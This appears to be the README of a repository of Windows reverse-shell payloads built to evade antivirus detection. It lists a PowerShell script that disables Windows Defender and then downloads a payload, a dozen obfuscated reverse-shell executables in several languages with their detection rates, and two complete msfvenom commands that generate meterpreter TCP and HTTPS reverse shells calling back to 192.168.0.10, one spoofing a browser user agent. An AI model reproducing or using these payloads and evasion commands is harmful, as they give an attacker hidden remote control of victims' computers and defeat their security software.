payloads

!!DOWNLOAD ONLY IN A CONTROLLED ENVIRONMENT!!

All payloads here point to host 192.168.0.10:4444.

Warning: Downloading items here will likely trigger alerts from your antivirus programs, so do so in a controlled environment. Executing the files here technically should pose no harm since they only connect to a private IP, but again, do so in a controlled environment.

kib_keyboard.ps1 is a PowerShell script that disables Windows Defender and notifications, then downloads the actual payload.

Payload descriptions (files marked with X are detected by Windows Defender):

  1. kidx86.exe is an x86 TCP reverse shell written in C++, encoded using shikata_ga_nai, with byte changes, scrambled bytes, extra dummy bytes and byte-order obfuscation. 12/69 hits on VirusTotal (when it was first submitted). Able to bypass Windows Defender.
  2. kidx86_source.cpp is the source file of the payload.
  3. shell.c is the raw payload from msfvenom. Generated by `msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=4444 -e x86/shikata_ga_nai -i 8 -f c > shell.c`
  4. shell.exe is a generic TCP reverse shell. X
  5. bkbx64.exe is an x64 TCP reverse shell encoded in a custom C++ payload. X
  6. bkbx86.exe is an x86 TCP reverse shell encoded in a custom C++ payload. X
  7. bkbpayload.ll and bkbpayloadraw.cs are an XOR-encoded TCP reverse shell written as a custom C# payload that uses a PowerShell file to download and execute it in memory. (doesn't work)
  8. test1.exe is a TCP reverse shell encoded in a custom Python payload. X
  9. testing9.exe is an edited TCP reverse shell created using Veil, before changing from .bat to .exe. X
  10. c_rtcp.exe is a TCP reverse shell written in C. X
  11. cs_rtcp.exe is a TCP reverse shell written in C#. X
  12. go_rtcp.exe is a TCP reverse shell written in Go. X

Generating an HTTPS reverse shell: `msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.10 LPORT=443 HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -e x86/shikata_ga_nai -i 8 -f c > shell.c`

A number of tools and languages were used in the process of trying to bypass Windows Defender, including Veil, the Metasploit Windows Defender evasion modules and compiling custom payloads; we tried payloads encoded using Python, C, C++, C#, Ruby, Go and Java.